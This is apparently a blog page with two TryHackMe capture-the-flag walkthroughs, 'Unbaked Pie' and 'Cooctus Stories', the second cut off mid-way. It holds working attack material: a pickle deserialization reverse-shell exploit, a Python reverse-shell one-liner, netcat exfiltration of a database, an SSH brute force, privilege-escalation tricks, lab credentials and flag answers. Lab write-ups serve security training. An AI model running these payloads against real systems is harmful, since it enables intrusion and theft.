Aldeid News

Navigating the Dark Web

Wed, 23 Apr 2025 07:54:00 +0000

TryHackMe > Unbaked Pie

Sun, 6 Jun 2021 11:34:00 +0000

Don’t over-baked your pie!

Please allow 5 minutes for this instance to fully deploy before attacking. This VM was developed in collaboration with @ch4rm, thanks to him for the foothold and privilege escalation ideas.

User Flag

Services

Running Nmap will only reveal 1 open port:

PORT     STATE SERVICE    VERSION
5003/tcp open  filemaker?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 05 Jun 2021 05:28:13 GMT
|     Server: WSGIServer/0.2 CPython/3.8.6
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Vary: Cookie
|     Content-Length: 7453
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Set-Cookie: csrftoken=gUg8DDUyJ5P5vaMKslwVHlS7qW7Q5vYjs4UxckkYelW73hYuVAHq8hLZqB7EWefU; expires=Sat, 04 Jun 2022 05:28:13 GMT; Max-Age=31449600; Path=/; SameSite=Lax
|     
|     
|     
|     
|     
|     
|     
|     [Un]baked | /
|     
|     
|     
|     
|     
|     
|     
|     
|     
|     [Un]baked | /
|     
|     
|     
|_    Django application

Browsing the robots.txt page leads to a 404 error page with the below debug message as DEBUG is set to True in the Django application. It discloses all possible locations in the application:

Page not found (404)
Request Method:     GET
Request URL:    http://10.10.101.128:5003/robots.txt

Using the URLconf defined in bakery.urls, Django tried these URL patterns, in this order:

    admin/
    [name='home']
    share [name='share']
    search [name='search']
    about [name='about']
     [name='detail']
    accounts/
    ^static/(?P.*)$
    ^media/(?P.*)$

The current path, robots.txt, didn't match any of these.

Pickle in the search

Intercepting all requests in BurpSuite leads to understanding that there is a pickle stored in the search_cookie:

HTTP/1.1 200 OK
Date: Sat, 05 Jun 2021 05:59:09 GMT
Server: WSGIServer/0.2 CPython/3.8.6
Content-Type: text/html; charset=utf-8
X-Frame-Options: DENY
Vary: Cookie
Content-Length: 5878
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Set-Cookie:  search_cookie="gASVCQAAAAAAAACMBWFwcGxllC4="; Path=/
Set-Cookie:  csrftoken=UUD6QtcPz63MKhSdQJgK91xyDjsWUxWIrN8wR9LOLwJffuO3EQzY5Ul2kkccId2f; expires=Sat, 04 Jun 2022 05:59:09 GMT; Max-Age=31449600; Path=/; SameSite=Lax

This seems to be a pickle string that stores the content of the last searched string:

$ python3            
>>> import pickle
>>> import base64
>>> s = "gASVCQAAAAAAAACMBWFwcGxllC4="
>>> base64.b64decode(s)
b'\x80\x04\x95\t\x00\x00\x00\x00\x00\x00\x00\x8c\x05apple\x94.'
>>> pickle.loads(base64.b64decode(s))
'apple'

Exploit

Searching for exploits on python pickles led me to this resource, and I adapted the script to make a reverse shell:

import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.8.50.72 4444 > /tmp/f')
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))

Running the script gives me the following base64 encoded pickle:

$ python3 makepickle.py 
b'gASVaAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjE1ybSAvdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyAxMC44LjUwLjcyIDQ0NDQgPi90bXAvZpSFlFKULg=='

Now, intercept the request in BurpSuite and modify the value of the search_cookie:

POST /search HTTP/1.1
Host: 10.10.101.128:5003
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.101.128:5003/search
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
Origin: http://10.10.101.128:5003
Connection: close
Cookie: csrftoken=UUD6QtcPz63MKhSdQJgK91xyDjsWUxWIrN8wR9LOLwJffuO3EQzY5Ul2kkccId2f; search_cookie="gASVaAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjE1ybSAvdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyAxMC44LjUwLjcyIDQ0NDQgPi90bXAvZpSFlFKULg=="
Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=bU0PAWeQasy8PgUEVezIo4poKG4QSGq0INvfBCNPmSeBktQuJlSWkXdSrHO6Gmwx&query=apple

Now we have a reverse shell. We are root but there is no flag in the /root directory, and it seems that we are running in a docker environment:

┌──(kali㉿kali)-[/data/tryhackme/Unbaked_Pie/files]
└─$ nc -nlvp 4444         
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.101.128] 36542
/bin/sh: 0: can't access tty; job control turned off
# python3 -c "import pty;pty.spawn('/bin/bash')"
root@8b39a559b296:/home# id
id
uid=0(root) gid=0(root) groups=0(root)
root@8b39a559b296:/home# cd /root
cd /root
root@8b39a559b296:~# ll
ll
bash: ll: command not found
root@8b39a559b296:~# ls -la
ls -la
total 36
drwx------ 1 root root 4096 Oct  3  2020 .
drwxr-xr-x 1 root root 4096 Oct  3  2020 ..
-rw------- 1 root root  889 Oct  6  2020 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 3 root root 4096 Oct  3  2020 .cache
drwxr-xr-x 3 root root 4096 Oct  3  2020 .local
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw------- 1 root root    0 Sep 24  2020 .python_history
drwx------ 2 root root 4096 Oct  3  2020 .ssh
-rw-r--r-- 1 root root  254 Oct  3  2020 .wget-hsts
root@8b39a559b296:/home/site# ip addr
ip addr
1: lo:  mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
4: eth0@if5:  mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

Evade docker

The .bash_history file discloses and interesting command, and we understand that ramsey is a valid user to the SSH connection to the main host.

root@8b39a559b296:/home/site# cat /root/.bash_history
cat /root/.bash_history
nc
exit
ifconfig
ip addr
ssh 172.17.0.1
ssh 172.17.0.2
exit
ssh ramsey@172.17.0.1
exit
cd /tmp
wget https://raw.githubusercontent.com/moby/moby/master/contrib/check-config.sh
chmod +x check-config.sh
./check-config.sh 
nano /etc/default/grub
vi /etc/default/grub
apt install vi
apt update
apt install vi
apt install vim
apt install nano
nano /etc/default/grub
grub-update
apt install grub-update
apt-get install --reinstall grub
grub-update
exit
ssh ramsey@172.17.0.1 <---------------------- interesting
exit
ssh ramsey@172.17.0.1
exit
ls
cd site/
ls
cd bakery/
ls
nano settings.py 
exit
ls
cd site/
ls
cd bakery/
nano settings.py 
exit
apt remove --purge ssh
ssh
apt remove --purge autoremove open-ssh*
apt remove --purge autoremove openssh=*
apt remove --purge autoremove openssh-*
ssh
apt autoremove openssh-client
clear
ssh
ssh
ssh
exit

Database

However, we don’t know ramsey’s password. I first tried to get the sqlite3 database (Django database) to find credentials, but it seemed to be a rabbit hole.

In Kali:

┌──(kali㉿kali)-[/data/tryhackme/Unbaked_Pie/files]
└─$ nc -l -p 9999 > db.sqlite3

On the target:

root@8b39a559b296:/home/site# nc -w 3 10.8.50.72 9999 < db.sqlite3
nc -w 3 10.8.50.72 9999 < db.sqlite3

We can dump the auth_user table:

┌──(kali㉿kali)-[/data/tryhackme/Unbaked_Pie/files]
└─$ sqlite3 db.sqlite3      
sqlite> .tables
auth_group                  django_admin_log          
auth_group_permissions      django_content_type       
auth_permission             django_migrations         
auth_user                   django_session            
auth_user_groups            homepage_article          
auth_user_user_permissions
sqlite> select * from auth_user;
1|pbkdf2_sha256$216000$3fIfQIweKGJy$xFHY3JKtPDdn/AktNbAwFKMQnBlrXnJyU04GElJKxEo=|2020-10-03 10:43:47.229292|1|aniqfakhrul|||1|1|2020-10-02 04:50:52.424582|
11|pbkdf2_sha256$216000$0qA6zNH62sfo$8ozYcSpOaUpbjPJz82yZRD26ZHgaZT8nKWX+CU0OfRg=|2020-10-02 10:16:45.805533|0|testing|||0|1|2020-10-02 10:16:45.686339|
12|pbkdf2_sha256$216000$hyUSJhGMRWCz$vZzXiysi8upGO/DlQy+w6mRHf4scq8FMnc1pWufS+Ik=|2020-10-03 10:44:10.758867|0|ramsey|||0|1|2020-10-02 14:42:44.388799|
13|pbkdf2_sha256$216000$Em73rE2NCRmU$QtK5Tp9+KKoP00/QV4qhF3TWIi8Ca2q5gFCUdjqw8iE=|2020-10-02 14:42:59.192571|0|oliver|||0|1|2020-10-02 14:42:59.113998|
14|pbkdf2_sha256$216000$oFgeDrdOtvBf$ssR/aID947L0jGSXRrPXTGcYX7UkEBqWBzC+Q2Uq+GY=|2020-10-02 14:43:15.187554|0|wan|||0|1|2020-10-02 14:43:15.102863|

But I was not able to crack these hashes (aborted the hashcat process after 2 hours).

$ cat ramsey.hash
ramsey:pbkdf2_sha256$216000$hyUSJhGMRWCz$vZzXiysi8upGO/DlQy+w6mRHf4scq8FMnc1pWufS+Ik=
$ hashcat -m 10000 --username ramsey.hash /usr/share/wordlists/rockyou.txt

Brute force ramsey’s SSH account

Neither ssh nor socat are installed on the docker container. Let’s use chisel.

On Kali:

┌──(kali㉿kali)-[/data/tryhackme/Unbaked_Pie/files]
└─$ ./chisel server -p 2223 --reverse

On the target:

root@8b39a559b296:/home# ./chisel client 10.8.50.72:2223 R:22:172.17.0.1:22

Now, let’s crack ramsey’s accont:

┌──(kali㉿kali)-[/data/tryhackme/Unbaked_Pie/files]
└─$ hydra -l ramsey -P /usr/share/wordlists/rockyou.txt ssh://localhost                                        255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-05 09:26:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://localhost:22/
[22][ssh] host: localhost   login: ramsey   password: 12345678
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-05 09:26:44

Ramsey’s flag

We can now connect as ramsey:

┌──(kali㉿kali)-[/data/tryhackme/Unbaked_Pie/files]
└─$ sshpass -p "12345678" ssh ramsey@localhost                                                                127 ⨯
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


39 packages can be updated.
26 updates are security updates.


Last login: Tue Oct  6 22:39:31 2020 from 172.17.0.2
ramsey@unbaked:~$ ll
total 48
drwxr-xr-x 5 ramsey ramsey 4096 Oct  6  2020 ./
drwxr-xr-x 4 root   root   4096 Oct  3  2020 ../
-rw------- 1 root   root      1 Oct  5  2020 .bash_history
-rw-r--r-- 1 ramsey ramsey 3771 Oct  3  2020 .bashrc
drwx------ 3 ramsey ramsey 4096 Oct  3  2020 .cache/
drwx------ 4 ramsey ramsey 4096 Oct  3  2020 .local/
drwxrwxr-x 2 ramsey ramsey 4096 Oct  3  2020 .nano/
-rwxrw-r-- 1 ramsey ramsey 1645 Oct  3  2020 payload.png*
-rw-r--r-- 1 ramsey ramsey  655 Oct  3  2020 .profile
-rw-r--r-- 1 root   root     38 Oct  6  2020 user.txt
-rw-r--r-- 1 root   ramsey 4369 Oct  3  2020 vuln.py
ramsey@unbaked:~$ cat user.txt 
THM{ce778dd41bec31e1daed77ebebcd7423}

User flag: THM{ce778dd41bec31e1daed77ebebcd7423}

Root Flag

Lateral move (ramsey -> oliver)

Ramsey can run vuln.py as oliver:

ramsey@unbaked:~$ sudo -l
[sudo] password for ramsey: 
Matching Defaults entries for ramsey on unbaked:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ramsey may run the following commands on unbaked:
    (oliver) /usr/bin/python /home/ramsey/vuln.py

Below is the content of the script:

ramsey@unbaked:~$ cat vuln.py 
#!/usr/bin/python
# coding=utf-8

try:
    from PIL import Image
except ImportError:
    import Image
import pytesseract
import sys
import os
import time


#Header
def header():
    banner = '''\033[33m                                             
                      (
                       )
                      __..---..__
                  ,-='  /  |  \  `=-.
                 :--..___________..--;
                  \.,_____________,./
         

██╗███╗   ██╗ ██████╗ ██████╗ ███████╗██████╗ ██╗███████╗███╗   ██╗████████╗███████╗
██║████╗  ██║██╔════╝ ██╔══██╗██╔════╝██╔══██╗██║██╔════╝████╗  ██║╚══██╔══╝██╔════╝
██║██╔██╗ ██║██║  ███╗██████╔╝█████╗  ██║  ██║██║█████╗  ██╔██╗ ██║   ██║   ███████╗
██║██║╚██╗██║██║   ██║██╔══██╗██╔══╝  ██║  ██║██║██╔══╝  ██║╚██╗██║   ██║   ╚════██║
██║██║ ╚████║╚██████╔╝██║  ██║███████╗██████╔╝██║███████╗██║ ╚████║   ██║   ███████║
╚═╝╚═╝  ╚═══╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═════╝ ╚═╝╚══════╝╚═╝  ╚═══╝   ╚═╝   ╚══════╝
\033[m'''
        return banner

#Function Instructions
def instructions():
    print "\n\t\t\t",9 * "-" , "WELCOME!" , 9 * "-"
    print "\t\t\t","1. Calculator"
    print "\t\t\t","2. Easy Calculator"
    print "\t\t\t","3. Credits"
    print "\t\t\t","4. Exit"
    print "\t\t\t",28 * "-"

def instructions2():
    print "\n\t\t\t",9 * "-" , "CALCULATOR!" , 9 * "-"
    print "\t\t\t","1. Add"
    print "\t\t\t","2. Subtract"
    print "\t\t\t","3. Multiply"
    print "\t\t\t","4. Divide"
    print "\t\t\t","5. Back"
    print "\t\t\t",28 * "-"
    
def credits():
    print "\n\t\tHope you enjoy learning new things  - Ch4rm & H0j3n\n"
    
# Function Arithmetic

# Function to add two numbers  
def add(num1, num2): 
    return num1 + num2 
  
# Function to subtract two numbers  
def subtract(num1, num2): 
    return num1 - num2 
  
# Function to multiply two numbers 
def multiply(num1, num2): 
    return num1 * num2 
  
# Function to divide two numbers 
def divide(num1, num2): 
    return num1 / num2 
# Main      
if __name__ == "__main__":
    print header()
    
    #Variables
    OPTIONS = 0
    OPTIONS2 = 0
    TOTAL = 0
    NUM1 = 0
    NUM2 = 0

    while(OPTIONS != 4):
        instructions()
        OPTIONS = int(input("\t\t\tEnter Options >> "))
            print "\033c"
        if OPTIONS == 1:
            instructions2()
            OPTIONS2 = int(input("\t\t\tEnter Options >> "))
            print "\033c"
            if OPTIONS2 == 5:
                continue
            else:
                NUM1 = int(input("\t\t\tEnter Number1 >> "))
                NUM2 = int(input("\t\t\tEnter Number2 >> "))
                if OPTIONS2 == 1:
                    TOTAL = add(NUM1,NUM2)
                if OPTIONS2 == 2:
                    TOTAL = subtract(NUM1,NUM2)
                if OPTIONS2 == 3:
                    TOTAL = multiply(NUM1,NUM2)
                if OPTIONS2 == 4:
                    TOTAL = divide(NUM1,NUM2)
                print "\t\t\tTotal >> $",TOTAL
        if OPTIONS == 2:
            animation = ["[■□□□□□□□□□]","[■■□□□□□□□□]", "[■■■□□□□□□□]", "[■■■■□□□□□□]", "[■■■■■□□□□□]", "[■■■■■■□□□□]", "[■■■■■■■□□□]", "[■■■■■■■■□□]", "[■■■■■■■■■□]", "[■■■■■■■■■■]"]

            print "\r\t\t\t     Waiting to extract..."
            for i in range(len(animation)):
                time.sleep(0.5)
                sys.stdout.write("\r\t\t\t         " + animation[i % len(animation)])
                sys.stdout.flush()

            LISTED = pytesseract.image_to_string(Image.open('payload.png')) 

            TOTAL = eval(LISTED)
            print "\n\n\t\t\tTotal >> $",TOTAL
        if OPTIONS == 3:
            credits()
    sys.exit(-1)

At this stage, it seems we have 2 ways of moving forward. Either we find an exploit on the python script itself, or we replace the content of the script, as it is in our home folder.

The script is owned by root and we only have read access to the file:

ramsey@unbaked:~$ ls -l /home/ramsey/vuln.py 
-rw-r--r-- 1 root ramsey 4369 Oct  3  2020 /home/ramsey/vuln.py

However, the file is in our home folder, and we can rename it. Let’s take advantage of this to replace its content:

ramsey@unbaked:~$ cat > /home/ramsey/vuln2.py << EOF
> #!/usr/bin/python
> import pty
> pty.spawn('/bin/bash')
> EOF
ramsey@unbaked:~$ mv vuln.py vuln.bak
ramsey@unbaked:~$ cp vuln2.py vuln.py

Now, running our modified copy will grant access as oliver:

ramsey@unbaked:~$ sudo -u oliver /usr/bin/python /home/ramsey/vuln.py
oliver@unbaked:~$ id
uid=1002(oliver) gid=1002(oliver) groups=1002(oliver),1003(sysadmin)

Privilege escalation

Our new user can run dockerScript.py as root without password, and can set the environment variable as well (SETENV).

oliver@unbaked:~$ sudo -l
Matching Defaults entries for oliver on unbaked:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User oliver may run the following commands on unbaked:
    (root) SETENV: NOPASSWD: /usr/bin/python /opt/dockerScript.py

The script is importing the docker library:

oliver@unbaked:~$ ls -l /opt/dockerScript.py 
-rwxr-x--- 1 root sysadmin 290 Oct  3  2020 /opt/dockerScript.py
oliver@unbaked:~$ cat /opt/dockerScript.py 
import docker

# oliver, make sure to restart docker if it crashes or anything happened.
# i havent setup swap memory for it
# it is still in development, please dont let it live yet!!!
client = docker.from_env()
client.containers.run("python-django:latest", "sleep infinity", detach=True)

As we can set the environment variable, let’s create our own docker library:

oliver@unbaked:/home/oliver$ cat > /home/oliver/docker.py << EOF
> import pty
> pty.spawn('/bin/bash')
> EOF

Now, we can run the script as follows, to get a root access:

oliver@unbaked:/home/oliver$ sudo PYTHONPATH=/home/oliver /usr/bin/python /opt/dockerScript.py
root@unbaked:/home/oliver# id
uid=0(root) gid=0(root) groups=0(root)
root@unbaked:/home/oliver# cat /root/
.bash_history  .cache/        .profile       
.bashrc        .nano/         root.txt       
root@unbaked:/home/oliver# cat /root/root.txt 
CONGRATS ON PWNING THIS BOX!
Created by ch4rm & H0j3n
ps: dont be mad us, we hope you learn something new

flag: THM{1ff4c893b3d8830c1e188a3728e90a5f}

Root flag: THM{1ff4c893b3d8830c1e188a3728e90a5f}

TryHackMe > Cooctus Stories

Fri, 28 May 2021 06:50:00 +0000

This room is about the Cooctus Clan.

Previously on Cooctus Tracker

Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened. (From Overpass 2 - Hacked by NinjaJc01)

Present times

Further investigation revealed that the hack was made possible by the help of an insider threat. Paradox helped the Cooctus Clan hack overpass in exchange for the secret shiba stash. Now, we have discovered a private server deep down under the boiling hot sands of the Saharan Desert. We suspect it is operated by the Clan and it’s your objective to uncover their plans.

Note: A stable shell is recommended, so try and SSH into users when possible.

Paradox is nomming cookies

Hint: Confront the CAT!

Services

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:44:62:91:90:08:99:5d:e8:55:4f:69:ca:02:1c:10 (RSA)
|   256 e5:a7:b0:14:52:e1:c9:4e:0d:b8:1a:db:c5:d6:7e:f0 (ECDSA)
|_  256 02:97:18:d6:cd:32:58:17:50:43:dd:d2:2f:ba:15:53 (ED25519)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      37644/udp6  mountd
|   100005  1,2,3      41390/udp   mountd
|   100005  1,2,3      49245/tcp6  mountd
|   100005  1,2,3      59977/tcp   mountd
|   100021  1,3,4      34839/tcp6  nlockmgr
|   100021  1,3,4      35275/udp   nlockmgr
|   100021  1,3,4      36517/tcp   nlockmgr
|   100021  1,3,4      40081/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
8080/tcp  open  http     Werkzeug httpd 0.14.1 (Python 3.6.9)
|_http-server-header: Werkzeug/0.14.1 Python/3.6.9
|_http-title: CCHQ
36517/tcp open  nlockmgr 1-4 (RPC #100021)
43101/tcp open  mountd   1-3 (RPC #100005)
55387/tcp open  mountd   1-3 (RPC #100005)
59977/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NFS

There is a NFS network share that reveals credentials:

Username: paradoxial.test
Password: ShibaPretzel79

┌──(kali㉿kali)-[/data/Cooctus_Stories/files]
└─$ mkdir tmp  
                                                                                                                     
┌──(kali㉿kali)-[/data/Cooctus_Stories/files]
└─$ sudo mount -t nfs 10.10.94.63: tmp 
                                                                                                                     
┌──(kali㉿kali)-[/data/Cooctus_Stories/files]
└─$ tree tmp 
tmp
└── var
    └── nfs
        └── general
            └── credentials.bak

3 directories, 1 file
                                                                                                                     
┌──(kali㉿kali)-[/data/Cooctus_Stories/files]
└─$ cat tmp/var/nfs/general/credentials.bak 
paradoxial.test
ShibaPretzel79

Web

There is a web service running on port 8080. There is no robots.txt file but the enumeration reveals 2 locations.

└─$ gobuster dir -u http://10.10.94.63:8080 -w /usr/share/wordlists/dirb/common.txt                            5 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.94.63:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/28 09:46:41 Starting gobuster in directory enumeration mode
===============================================================
/cat                  (Status: 302) [Size: 219] [--> http://10.10.94.63:8080/login]
/login                (Status: 200) [Size: 556]                                      
                                                                                     
===============================================================
2021/05/28 09:47:35 Finished
===============================================================

We can login (http://10.10.94.63:8080/login) using the credentials found just previously. Once logged in, we are redirected to the /cat page.

Reverse Shell

After playing a bit with the form and payloads, I was able to send the following payload (python reverse shell):

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

We now have a reverse shell:

$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.94.63] 35218
bash: cannot set terminal process group (726): Inappropriate ioctl for device
bash: no job control in this shell
paradox@cchq:~$ pwd
pwd
/home/paradox

Paradox Flag

paradox@cchq:~$ ll
ll
total 36
drwxr-xr-x 5 paradox paradox 4096 Feb 22 18:48 ./
drwxr-xr-x 6 root    root    4096 Jan  2 10:24 ../
lrwxrwxrwx 1 paradox paradox    9 Feb 20 17:13 .bash_history -> /dev/null
-rw-r--r-- 1 paradox paradox  220 Jan  2 10:24 .bash_logout
-rw-r--r-- 1 paradox paradox 3882 Feb 20 21:50 .bashrc
drwx------ 2 paradox paradox 4096 Jan  2 18:31 .cache/
drwxr-xr-x 4 paradox paradox 4096 Jan  1 22:03 CATapp/
drwx------ 3 paradox paradox 4096 Jan  2 18:31 .gnupg/
-rw-r--r-- 1 paradox paradox  807 Jan  2 10:24 .profile
-rw------- 1 paradox paradox   38 Feb 20 20:23 user.txt
paradox@cchq:~$ cat user.txt
cat user.txt
THM{2dccd1ab3e03990aea77359831c85ca2}

Paradox flag: THM{2dccd1ab3e03990aea77359831c85ca2}

Find out what Szymex is working on

Hint: Locating shipment…

The SniffingCat.py script

Add your SSH public key to /home/paradox/.ssh/authorized_keys and connect via SSH directly as paradox. When we connect, we can notice a message displayed every minute:

Broadcast message from szymex@cchq (somewhere) (Fri May 28 09:52:01 2021):     
                                                                               
Approximate location of an upcoming Dr.Pepper shipment found:
                                                                               
                                                                               
Broadcast message from szymex@cchq (somewhere) (Fri May 28 09:52:01 2021):     
                                                                               
Coordinates: X: 306, Y: 26, Z: 9
                                                                               
                                                                               
Broadcast message from szymex@cchq (somewhere) (Fri May 28 09:53:01 2021):     
                                                                               
Approximate location of an upcoming Dr.Pepper shipment found:
                                                                               
                                                                               
Broadcast message from szymex@cchq (somewhere) (Fri May 28 09:53:01 2021):     
                                                                               
Coordinates: X: 567, Y: 48, Z: 815

There is a note in the home folder, as well as a python script (SniffingCat.py):

paradox@cchq:/home/szymex$ ll
total 44
drwxr-xr-x 5 szymex szymex 4096 Feb 22 18:45 ./
drwxr-xr-x 6 root   root   4096 Jan  2 10:24 ../
lrwxrwxrwx 1 szymex szymex    9 Feb 20 17:13 .bash_history -> /dev/null
-rw-r--r-- 1 szymex szymex  220 Jan  2 09:13 .bash_logout
-rw-r--r-- 1 szymex szymex 3865 Feb 20 21:27 .bashrc
drwx------ 2 szymex szymex 4096 Jan  2 09:27 .cache/
drwx------ 3 szymex szymex 4096 Jan  2 21:44 .gnupg/
drwxrwxr-x 3 szymex szymex 4096 Jan  2 10:59 .local/
-r-------- 1 szymex szymex   11 Jan  2 14:18 mysupersecretpassword.cat
-rw-rw-r-- 1 szymex szymex  316 Feb 20 20:31 note_to_para
-rwxrwxr-- 1 szymex szymex  735 Feb 20 20:30 SniffingCat.py*
-rw------- 1 szymex szymex   38 Feb 22 18:45 user.txt
paradox@cchq:/home/szymex$ cat note_to_para 
Paradox,

I'm testing my new Dr. Pepper Tracker script. 
It detects the location of shipments in real time and sends the coordinates to your account.
If you find this annoying you need to change my super secret password file to disable the tracker.

You know me, so you know how to get access to the file.

- Szymex

Checking the crontab confirms that the script is called by szymex and runs every minute:

paradox@cchq:/home/szymex$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   szymex  /home/szymex/SniffingCat.py
#

Below is the script:

paradox@cchq:/home/szymex$ cat SniffingCat.py 
#!/usr/bin/python3
import os
import random

def encode(pwd):
    enc = ''
    for i in pwd:
        if ord(i) > 110:
            num = (13 - (122 - ord(i))) + 96
            enc += chr(num)
        else:
            enc += chr(ord(i) + 13)
    return enc


x = random.randint(300,700)
y = random.randint(0,255)
z = random.randint(0,1000)

message = "Approximate location of an upcoming Dr.Pepper shipment found:"
coords = "Coordinates: X: {x}, Y: {y}, Z: {z}".format(x=x, y=y, z=z)

with open('/home/szymex/mysupersecretpassword.cat', 'r') as f:
    line = f.readline().rstrip("\n")
    enc_pw = encode(line)
    if enc_pw == "pureelpbxr":
        os.system("wall -g paradox " + message)
        os.system("wall -g paradox " + coords)

The script above provides us with the encoded form of a password: pureelpbxr. Now, we need to reverse it.

Reverse engineer the password

The script is applying a transformation to the password in clear (saved in mysupersecretpassword.cat) and displays the message if the encoded password is equal to pureelpbxr. Let’s build a quick and dirty python script that will get each letter of the alphabet, and apply the transformation, to build a conversion table.

┌──(kali㉿kali)-[/data/Cooctus_Stories/files]
└─$ cat test.py                            
#!/usr/bin/python3

def encode(pwd):
    enc = ''
    for i in pwd:
        if ord(i) > 110:
            num = (13 - (122 - ord(i))) + 96
            enc += chr(num)
        else:
            enc += chr(ord(i) + 13)
    return enc

s = 'abcdefghijklmnopqrstuvwxyz'
clear = list(s)
encoded = list(encode(s))

pwd = "pureelpbxr"
dec = ""

for i in pwd:
    dec += clear[encoded.index(i)]

print(dec)

Running the script will reveal the password in the clear:

$ python3 test.py
cherrycoke

Lateral move (paradox -> szymex)

Now we can move to szymex and read the password:

paradox@cchq:/home/szymex$ su szymex
Password: 
szymex@cchq:~$ id
uid=1001(szymex) gid=1001(szymex) groups=1001(szymex),1004(testers)
szymex@cchq:~$ cd /home/szymex/
szymex@cchq:~$ ll
total 44
drwxr-xr-x 5 szymex szymex 4096 Feb 22 18:45 ./
drwxr-xr-x 6 root   root   4096 Jan  2 10:24 ../
lrwxrwxrwx 1 szymex szymex    9 Feb 20 17:13 .bash_history -> /dev/null
-rw-r--r-- 1 szymex szymex  220 Jan  2 09:13 .bash_logout
-rw-r--r-- 1 szymex szymex 3865 Feb 20 21:27 .bashrc
